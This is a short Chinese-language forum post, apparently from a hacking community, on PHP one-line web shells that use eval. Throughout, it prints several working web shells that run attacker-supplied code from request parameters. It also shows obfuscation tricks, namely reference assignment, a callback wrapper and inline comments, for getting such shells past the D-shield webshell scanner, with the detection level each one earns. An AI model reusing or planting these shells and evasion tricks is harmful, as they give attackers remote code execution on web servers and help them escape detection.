eval与php一句话的关系

part1

首先我们知道，eval能执行php代码，最常见的php一句话也是用eval关键字的。

<?php @eval($_GET["code"])?>

Part2

在T00ls论坛混的时候，有一个现象，如果有人分享免杀一句话，里面用了 eval 这个关键字，很多人就会如图

Part3

很多表哥都这样说，主要还是因为eval这个函数，在人们心中是个危险函数，基本WAF看见秒杀那种，可事实真的是这样嘛??!

Part4

- 必被秒杀的一句话

<?php
$a= $_REQUEST[1];
eval($a);

D盾 4级

- 我觉得还可以抢救的一句话

<?php
$a = $_REQUEST[1];
eval($b=&$a); 
// 将变量$a的值引用给$b，所以在这里$a和$b是相等的。

轻松过D盾，来个图

- 注释一句话

这个回调函数的一句话，报了1级，如何完全过D盾呢

最后附上代码

<?php
$a=call_user_func(function($u){return @$_REQUEST[$u];},'1');
eval(/**/($a));